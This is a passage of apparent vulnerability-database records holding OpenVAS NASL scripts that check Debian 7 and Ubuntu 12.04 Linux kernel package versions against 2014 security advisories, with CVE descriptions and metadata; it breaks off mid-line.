ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sparc64-smp\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-versatile\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-vexpress\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-486\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-4kc-malta\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-5kc-malta\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-686-pae\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-686-pae-dbg\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-amd64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-amd64-dbg\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-iop32x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-itanium\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-ixp4xx\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-kirkwood\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-loongson-2f\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mckinley\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mv78xx0\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mx5\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-octeon\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-omap\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-orion5x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc-smp\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r4k-ip22\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-cobalt\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-ip32\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-686-pae\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-686-pae-dbg\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-amd64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-amd64-dbg\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x-dbg\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x-tape\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1-bcm91250a\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1a-bcm91480b\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sparc64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sparc64-smp\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-versatile\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-vexpress\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-manual-3.2\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-source-3.2\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-support-3.2.0-4\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-4-686-pae\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-4-amd64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-doc-3.2\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-486\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-4kc-malta\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-5kc-malta\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-686-pae\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-amd64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-armel\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-armhf\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-i386\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-ia64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mips\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mipsel\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-powerpc\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-s390\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-s390x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-sparc\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-amd64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common-rt\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-iop32x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-itanium\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-ixp4xx\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-kirkwood\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-loongson-2f\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mckinley\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mv78xx0\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mx5\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-octeon\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-omap\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-orion5x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc-smp\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r4k-ip22\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-cobalt\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-ip32\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-rt-686-pae\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-rt-amd64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-s390x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1-bcm91250a\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1a-bcm91480b\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sparc64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sparc64-smp\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-versatile\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-vexpress\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-486\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-4kc-malta\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-5kc-malta\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-686-pae\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-686-pae-dbg\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-amd64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-amd64-dbg\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-iop32x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-itanium\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-ixp4xx\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-kirkwood\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-loongson-2f\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mckinley\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mv78xx0\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mx5\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-octeon\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-omap\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-orion5x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc-smp\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r4k-ip22\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-cobalt\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-ip32\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-686-pae\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-686-pae-dbg\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-amd64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-amd64-dbg\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x-dbg\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x-tape\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1-bcm91250a\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1a-bcm91480b\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sparc64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sparc64-smp\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-versatile\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-vexpress\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-manual-3.2\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-source-3.2\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-support-3.2.0-4\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-4-686-pae\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-4-amd64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-30T13:49:28", "references": ["2283-1", "http://www.ubuntu.com/usn/usn-2283-1/"], "pluginID": "1361412562310841899", "description": "Check for the Version of linux", "edition": 5, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-07-21T00:00:00", "title": "Ubuntu Update for linux USN-2283-1", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0131", "CVE-2014-4943", "CVE-2014-4608"], "modified": "2018-04-27T00:00:00", "id": "OPENVAS:1361412562310841899", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841899", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2283_1.nasl 9651 2018-04-27 08:59:56Z cfischer $\n#\n# Ubuntu Update for linux USN-2283-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841899\");\n script_version(\"$Revision: 9651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-27 10:59:56 +0200 (Fri, 27 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-21 17:13:19 +0530 (Mon, 21 Jul 2014)\");\n script_cve_id(\"CVE-2014-4943\", \"CVE-2014-0131\", \"CVE-2014-4608\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux USN-2283-1\");\n\n\n script_tag(name : \"affected\" , value : \"linux on Ubuntu 12.04 LTS\");\n script_tag(name : \"insight\" , value : \"Sasha Levin reported a flaw in the Linux kernel's\npoint-to-point protocol (PPP) when used with the Layer Two Tunneling Protocol\n(L2TP). A local user could exploit this flaw to gain administrative privileges.\n(CVE-2014-4943)\n\nMichael S. Tsirkin discovered an information leak in the Linux kernel's\nsegmentation of skbs when using the zerocopy feature of vhost-net. A local\nattacker could exploit this flaw to gain potentially sensitive information\nfrom kernel memory. (CVE-2014-0131)\n\nDon Bailey discovered a flaw in the LZO decompress algorithm used by the\nLinux kernel. An attacker could exploit this flaw to cause a denial of\nservice (memory corruption or OOPS). (CVE-2014-4608)\");\n script_tag(name : \"solution\" , value : \"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"USN\", value: \"2283-1\");\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-2283-1/\");\n script_tag(name:\"summary\", value:\"Check for the Version of linux\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-67-generic\", ver:\"3.2.0-67.101\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-67-generic-pae\", ver:\"3.2.0-67.101\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-67-highbank\", ver:\"3.2.0-67.101\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-67-omap\", ver:\"3.2.0-67.101\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-67-powerpc-smp\", ver:\"3.2.0-67.101\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res 